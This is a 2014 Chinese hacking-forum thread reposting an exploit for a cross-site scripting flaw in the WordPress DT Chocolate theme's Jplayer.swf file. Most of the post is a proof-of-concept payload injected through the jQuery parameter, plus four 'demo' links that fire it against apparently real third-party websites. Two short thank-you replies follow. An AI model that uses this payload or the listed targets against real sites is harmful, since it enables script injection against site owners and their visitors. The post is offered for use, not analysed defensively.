搜索
查看: 835|回复: 2

WordPress DT Chocolate跨站脚本漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-1-21 23:00:49 来自手机 | 显示全部楼层 |阅读模式
Exploit:
Wordpress Theme DT Chocolate suffers froman xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN CYBER/)//
Demo:
http://www.impala-miami.com/wp-c ... Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://reportagesphotos-kaddouch ... Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://www.laluzdeunangel.com/nu ... Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://orianneboulage.fr/wp-cont ... Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN%20CYBER/)//
./3nD
854955425 该用户已被删除
发表于 2014-1-21 23:00:51 | 显示全部楼层
不知该说些什么。。。。。。就是谢谢
专业回帖 该用户已被删除
发表于 2014-1-21 23:16:30 | 显示全部楼层
学习了,不错,讲的太有道理了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表